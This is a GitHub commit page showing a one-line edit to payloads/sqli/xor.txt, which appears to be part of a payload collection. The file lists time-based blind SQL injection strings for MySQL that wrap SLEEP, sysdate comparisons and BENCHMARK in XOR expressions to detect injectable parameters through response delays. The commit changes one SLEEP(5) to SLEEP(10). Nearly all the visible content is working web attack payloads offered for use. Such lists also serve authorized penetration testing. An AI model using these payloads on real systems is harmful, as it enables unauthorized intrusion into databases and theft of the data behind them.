Skip to content

Commit

Permalink
Update xor.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
coffinxp authored Nov 27, 2024
1 parent 19dd332 commit 439b6bd
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion payloads/sqli/xor.txt
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
"XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR"Z
"XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR"Z
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
Expand Down

0 comments on commit 439b6bd

Please sign in to comment.